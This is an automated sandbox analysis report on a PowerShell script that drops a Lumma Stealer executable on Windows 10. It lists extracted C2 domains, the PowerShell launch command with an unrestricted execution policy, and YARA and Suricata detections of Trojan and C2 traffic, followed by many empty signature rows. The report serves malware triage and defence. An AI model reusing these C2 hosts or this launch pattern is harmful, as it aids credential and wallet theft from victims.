Windows
Analysis Report
sus.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 2664 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\sus .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - bubs.exe (PID: 4140 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Extra\bub s.exe" MD5: 442D526A26805C47376D7B4F78374A4F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["p3ar11fter.sbs", "3xp3cts1aim.sbs", "p10tgrace.sbs", "processhol.sbs", "appr0dress.cyou", "peepburry828.sbs"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:05.318740+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:06.867010+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:08.559667+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49797 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:09.791218+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49805 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:11.111269+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49816 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:13.386872+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49833 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:14.805694+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49844 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:16.450506+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49855 | 188.114.96.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:06.277618+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:07.898289+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
2024-11-20T12:39:16.840167+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49855 | 188.114.96.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:06.277618+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:07.898289+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-20T12:39:09.081508+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49797 | 188.114.96.3 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Code function: | 1_2_00007FFD348C4D12 | |
Source: | Code function: | 1_2_00007FFD348C4DFB | |
Source: | Code function: | 1_2_00007FFD348C3C1D | |
Source: | Code function: | 3_2_002D1000 | |
Source: | Code function: | 3_2_6C531D18 |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Code function: | 1_2_00007FFD348C7C6D | |
Source: | Code function: | 1_2_00007FFD348CF5F9 | |
Source: | Code function: | 1_2_00007FFD348C785D | |
Source: | Code function: | 1_2_00007FFD348C09C9 | |
Source: | Code function: | 1_2_00007FFD348C786D | |
Source: | Code function: | 1_2_00007FFD348C09C9 | |
Source: | Code function: | 1_2_00007FFD348C09F9 | |
Source: | Code function: | 1_2_00007FFD348C4B91 | |
Source: | Code function: | 1_2_00007FFD348C4C01 | |
Source: | Code function: | 1_2_00007FFD348C7C5D |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
